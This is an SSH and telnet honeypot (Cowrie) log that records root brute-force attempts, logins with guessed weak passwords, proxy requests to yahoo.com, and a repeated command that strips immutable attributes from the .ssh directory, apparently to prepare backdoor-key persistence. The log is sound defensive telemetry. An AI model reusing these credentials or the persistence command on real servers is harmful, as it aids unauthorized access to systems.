{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-26T20:41:14.184023Z","src_ip":"212.227.235.229","session":"073de0ee788b"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"d4:98:c4:f3:12:ef:3e:29:38:34:62:21:fd:99:ec:ef","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDdmvEhhfC8Hkqvut8spTxhahy1wKRJ/Bgy8HRDj6n+9EWntZc/L9zfjgReYfwWiZbNX5ziI4dv5lsUAMyCjbqxI4R0Vr5zoQf+YUrQ9nLwIjmkggnqPObpHoEz/n3xvNudIKXjWpEL3b5Be17y8vF01jzFc75asMXz5rLbYOi0EamMu5E+FxhaqNfMMasAkhpom4XfdF3/FZH41UTiaWhoZoPc8KcLJqotmlIZ/z04m0HI9w7l9l+wrUVuEGYbFTN4g3cCtDI21d4AH2JtIJkkKApW4ElLNGasOpid5lDWUHbhbrD4/6Um1u1SqyOmdKopIzkllPFqxJZMjwcw8f9v","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint d4:98:c4:f3:12:ef:3e:29:38:34:62:21:fd:99:ec:ef","sensor":"my-vps","timestamp":"2025-08-26T20:41:14.389895Z","src_ip":"212.227.235.229","session":"073de0ee788b"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"d4:98:c4:f3:12:ef:3e:29:38:34:62:21:fd:99:ec:ef","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDdmvEhhfC8Hkqvut8spTxhahy1wKRJ/Bgy8HRDj6n+9EWntZc/L9zfjgReYfwWiZbNX5ziI4dv5lsUAMyCjbqxI4R0Vr5zoQf+YUrQ9nLwIjmkggnqPObpHoEz/n3xvNudIKXjWpEL3b5Be17y8vF01jzFc75asMXz5rLbYOi0EamMu5E+FxhaqNfMMasAkhpom4XfdF3/FZH41UTiaWhoZoPc8KcLJqotmlIZ/z04m0HI9w7l9l+wrUVuEGYbFTN4g3cCtDI21d4AH2JtIJkkKApW4ElLNGasOpid5lDWUHbhbrD4/6Um1u1SqyOmdKopIzkllPFqxJZMjwcw8f9v","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T20:41:14.390526Z","src_ip":"212.227.235.229","session":"073de0ee788b"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"d4:98:c4:f3:12:ef:3e:29:38:34:62:21:fd:99:ec:ef","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDdmvEhhfC8Hkqvut8spTxhahy1wKRJ/Bgy8HRDj6n+9EWntZc/L9zfjgReYfwWiZbNX5ziI4dv5lsUAMyCjbqxI4R0Vr5zoQf+YUrQ9nLwIjmkggnqPObpHoEz/n3xvNudIKXjWpEL3b5Be17y8vF01jzFc75asMXz5rLbYOi0EamMu5E+FxhaqNfMMasAkhpom4XfdF3/FZH41UTiaWhoZoPc8KcLJqotmlIZ/z04m0HI9w7l9l+wrUVuEGYbFTN4g3cCtDI21d4AH2JtIJkkKApW4ElLNGasOpid5lDWUHbhbrD4/6Um1u1SqyOmdKopIzkllPFqxJZMjwcw8f9v","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint d4:98:c4:f3:12:ef:3e:29:38:34:62:21:fd:99:ec:ef","sensor":"my-vps","timestamp":"2025-08-26T20:41:14.494109Z","src_ip":"212.227.235.229","session":"073de0ee788b"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"d4:98:c4:f3:12:ef:3e:29:38:34:62:21:fd:99:ec:ef","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDdmvEhhfC8Hkqvut8spTxhahy1wKRJ/Bgy8HRDj6n+9EWntZc/L9zfjgReYfwWiZbNX5ziI4dv5lsUAMyCjbqxI4R0Vr5zoQf+YUrQ9nLwIjmkggnqPObpHoEz/n3xvNudIKXjWpEL3b5Be17y8vF01jzFc75asMXz5rLbYOi0EamMu5E+FxhaqNfMMasAkhpom4XfdF3/FZH41UTiaWhoZoPc8KcLJqotmlIZ/z04m0HI9w7l9l+wrUVuEGYbFTN4g3cCtDI21d4AH2JtIJkkKApW4ElLNGasOpid5lDWUHbhbrD4/6Um1u1SqyOmdKopIzkllPFqxJZMjwcw8f9v","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T20:41:14.494920Z","src_ip":"212.227.235.229","session":"073de0ee788b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33528,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8a630adfaa1","protocol":"ssh","message":"New connection: 212.227.235.229:33528 (1.2.3.4:22) [session: d8a630adfaa1]","sensor":"my-vps","timestamp":"2025-08-26T20:41:18.142289Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T20:41:18.143960Z","src_ip":"212.227.235.229","session":"d8a630adfaa1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T20:41:18.389625Z","src_ip":"212.227.235.229","session":"d8a630adfaa1"}
{"eventid":"cowrie.login.success","username":"root","password":"ADmin123","message":"login attempt [root/ADmin123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:41:19.352718Z","src_ip":"212.227.235.229","session":"d8a630adfaa1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:41:19.949220Z","src_ip":"212.227.235.229","session":"d8a630adfaa1"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T20:41:19.949897Z","src_ip":"212.227.235.229","session":"d8a630adfaa1"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T20:41:19.950906Z","src_ip":"212.227.235.229","session":"d8a630adfaa1"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:41:24.081660Z","src_ip":"212.227.235.229","session":"073de0ee788b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":51520,"dst_ip":"1.2.3.4","dst_port":22,"session":"04262d8fe50e","protocol":"ssh","message":"New connection: 213.209.150.239:51520 (1.2.3.4:22) [session: 04262d8fe50e]","sensor":"my-vps","timestamp":"2025-08-26T20:42:11.965922Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T20:42:11.966842Z","src_ip":"213.209.150.239","session":"04262d8fe50e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T20:42:12.013946Z","src_ip":"213.209.150.239","session":"04262d8fe50e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:42:12.249273Z","src_ip":"213.209.150.239","session":"04262d8fe50e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":21109,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:21109","sensor":"my-vps","timestamp":"2025-08-26T20:42:12.297703Z","session":"04262d8fe50e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T20:42:12.345049Z","src_ip":"213.209.150.239","session":"04262d8fe50e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":6899,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:6899","sensor":"my-vps","timestamp":"2025-08-26T20:42:12.481593Z","session":"04262d8fe50e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T20:42:12.528814Z","src_ip":"213.209.150.239","session":"04262d8fe50e"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:42:12.576834Z","src_ip":"213.209.150.239","session":"04262d8fe50e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51668,"dst_ip":"1.2.3.4","dst_port":23,"session":"b9b0e837963d","protocol":"telnet","message":"New connection: 212.227.235.229:51668 (1.2.3.4:23) [session: b9b0e837963d]","sensor":"my-vps","timestamp":"2025-08-26T20:42:41.303674Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59942,"dst_ip":"1.2.3.4","dst_port":22,"session":"04714aaeec6f","protocol":"ssh","message":"New connection: 212.227.235.229:59942 (1.2.3.4:22) [session: 04714aaeec6f]","sensor":"my-vps","timestamp":"2025-08-26T20:42:54.112813Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T20:42:54.122356Z","src_ip":"212.227.235.229","session":"04714aaeec6f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T20:42:54.376465Z","src_ip":"212.227.235.229","session":"04714aaeec6f"}
{"eventid":"cowrie.login.success","username":"root","password":"saqib","message":"login attempt [root/saqib] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:42:55.400498Z","src_ip":"212.227.235.229","session":"04714aaeec6f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:42:55.997030Z","src_ip":"212.227.235.229","session":"04714aaeec6f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T20:42:55.997738Z","src_ip":"212.227.235.229","session":"04714aaeec6f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T20:42:55.998587Z","src_ip":"212.227.235.229","session":"04714aaeec6f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:42:56.263655Z","src_ip":"212.227.235.229","session":"04714aaeec6f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42842,"dst_ip":"1.2.3.4","dst_port":22,"session":"a70da51018af","protocol":"ssh","message":"New connection: 212.227.235.229:42842 (1.2.3.4:22) [session: a70da51018af]","sensor":"my-vps","timestamp":"2025-08-26T20:43:16.675952Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:43:17.187991Z","src_ip":"212.227.235.229","session":"a70da51018af"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:43:17.188789Z","src_ip":"212.227.235.229","session":"a70da51018af"}
{"eventid":"cowrie.login.success","username":"root","password":"1234qwer!@#$","message":"login attempt [root/1234qwer!@#$] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:43:20.295942Z","src_ip":"212.227.235.229","session":"a70da51018af"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:43:21.235312Z","src_ip":"212.227.235.229","session":"a70da51018af"}
{"eventid":"cowrie.session.closed","duration":46.09927320480347,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:43:27.402872Z","src_ip":"212.227.235.229","session":"b9b0e837963d"}
{"eventid":"cowrie.session.connect","src_ip":"103.29.69.96","src_port":57734,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a6e8624fbab","protocol":"ssh","message":"New connection: 103.29.69.96:57734 (1.2.3.4:22) [session: 7a6e8624fbab]","sensor":"my-vps","timestamp":"2025-08-26T20:43:51.120250Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:43:51.121104Z","src_ip":"103.29.69.96","session":"7a6e8624fbab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40352,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6495aaa2e5e","protocol":"ssh","message":"New connection: 212.227.235.229:40352 (1.2.3.4:22) [session: e6495aaa2e5e]","sensor":"my-vps","timestamp":"2025-08-26T20:43:51.180609Z"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T20:43:51.387545Z","src_ip":"103.29.69.96","session":"7a6e8624fbab"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:43:52.341386Z","src_ip":"212.227.235.229","session":"e6495aaa2e5e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T20:43:52.342949Z","src_ip":"212.227.235.229","session":"e6495aaa2e5e"}
{"eventid":"cowrie.login.success","username":"root","password":"123qwerty","message":"login attempt [root/123qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:43:55.649059Z","src_ip":"212.227.235.229","session":"e6495aaa2e5e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:43:57.170774Z","src_ip":"212.227.235.229","session":"e6495aaa2e5e"}
